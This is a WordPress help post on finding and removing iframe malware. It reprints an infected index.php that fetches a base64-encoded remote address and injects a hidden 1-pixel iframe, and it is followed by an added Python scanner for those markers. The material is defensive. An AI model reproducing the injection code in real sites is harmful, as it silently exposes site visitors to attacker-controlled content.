Last updated on May 13th, 2016 at 12:35 pm
WordPress Iframe virus / Malware fix
Iframe malware is very common on WordPress websites. Webmasters who run WordPress as their back end have to spend most of their valuable time searching for the virus once a site is affected, and most of the time they end up shutting down their website
[if they do not have a habit of taking incremental backups].
Here are some tips on how to protect your website from these virus attacks.
1) Always take incremental backups.
2) Always scan your local computer / test box before uploading data or files to your web host through FTP or any other method.
3) Usually these viruses reside on your computer and compromise all your local files and executables. FTP software is attacked, and all the files you upload to your host will be edited by the virus accordingly.
4) If you have a WordPress-based website, be really careful while uploading data, as these viruses may even crack your DB info and corrupt it [least likely, but why take a chance].
5) Always keep your local computer / test box updated with the latest antivirus definitions.
6) It is always better to have a firewall installed on your local computer / test box. This will alert you whenever there is malicious activity. I recommend AVG Firewall / Antivirus. Your wish 🙂
7) Install antivirus on your website. This will scan your themes, which are one of the most vulnerable areas in WordPress.
Things to do once your website is infected with these viruses
1) Check your index.php in the WordPress install root directory.
2) Check for any change in the WordPress configuration.
3) A simple example of a corrupted index.php:
    <?php
    /**
     * Front to the WordPress application. This file doesn't do anything, but loads
     * wp-blog-header.php which does and tells WordPress to load the theme.
     *
     * @package WordPress
     */

    /**
     * Tells WordPress to load the WordPress theme and output it.
     *
     * @var bool
     */
    define('WP_USE_THEMES', true);

    /** Loads the WordPress Environment and Template */
    require('./wp-blog-header.php');
    $domen = file_get_contents(base64_decode('aHR0cDovL2JpZDRnZXQuY29tL2xpL2JiZTE1ZDc3ZTI0NTVjYjQyYmUyYjRhMjk5MDU0OWU0'));
    ?>
    <iframe src="http://<?php echo($domen);?>/index.php?tp=4069e0e648d6b2da" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>?>
You can see an iframe injected at the footer of the above file. That is the virus 🙂. Delete the iframe tag and also the line above it where a variable is assigned the result of file_get_contents. If it is still not working, restore the previous backup of index.php.
4) Always make sure your DB is not corrupted.
5) If your DB is corrupted, the only way is to restore it from the best backup available.
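One way to run the check from steps 1 and 3 over a whole install, added here as an example and not part of the original post: it walks a directory and flags PHP files carrying the two markers visible in the corrupted index.php, a file_get_contents(base64_decode(...)) fetch and a hidden or 1-pixel iframe. The function names, the regular expressions and the SAMPLE text (which uses a harmless .example host) are assumptions made for illustration.

```python
import base64
import re
import sys
from pathlib import Path

# Heuristics modelled on the corrupted index.php above; tune them for your site.
B64_FETCH = re.compile(
    r"file_get_contents\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]", re.I)
# <iframe ...> whose attributes (inline <?php ?> tags allowed) hide or shrink it.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b(?:<\?.*?\?>|[^>])*?"
    r"(?:visibility\s*:\s*hidden|display\s*:\s*none|width\s*=\s*[\"']?[01]\b)",
    re.I | re.S)

# Constructed sample (not the page's file): same structure, harmless .example host.
SAMPLE = """<?php
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
$domen = file_get_contents(base64_decode('aHR0cDovL21hbGljaW91cy5leGFtcGxlL2xp'));
?>
<iframe src="http://<?php echo($domen);?>/index.php" width=1 height=1></iframe>
"""


def scan_text(text):
    """Return sorted (line, kind, detail) findings for one file's contents."""
    findings = []
    for m in B64_FETCH.finditer(text):
        try:  # decode only to show the defender what the file would fetch
            detail = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:
            detail = "<undecodable base64>"
        findings.append((text.count("\n", 0, m.start()) + 1, "remote-fetch", detail))
    for m in HIDDEN_IFRAME.finditer(text):
        findings.append((text.count("\n", 0, m.start()) + 1, "hidden-iframe", m.group(0)))
    return sorted(findings)


def scan_tree(root):
    """Scan every .php file under root; return {path: findings} for files with hits."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        found = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if found:
            hits[str(path)] = found
    return hits


if __name__ == "__main__":
    for path, found in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for line, kind, detail in found:
            print(f"{path}:{line}: {kind}: {detail}")
```

Pass the WordPress root directory as the first argument. A hit is a lead to inspect and compare against a clean backup, since legitimate themes and plugins can also contain hidden iframes.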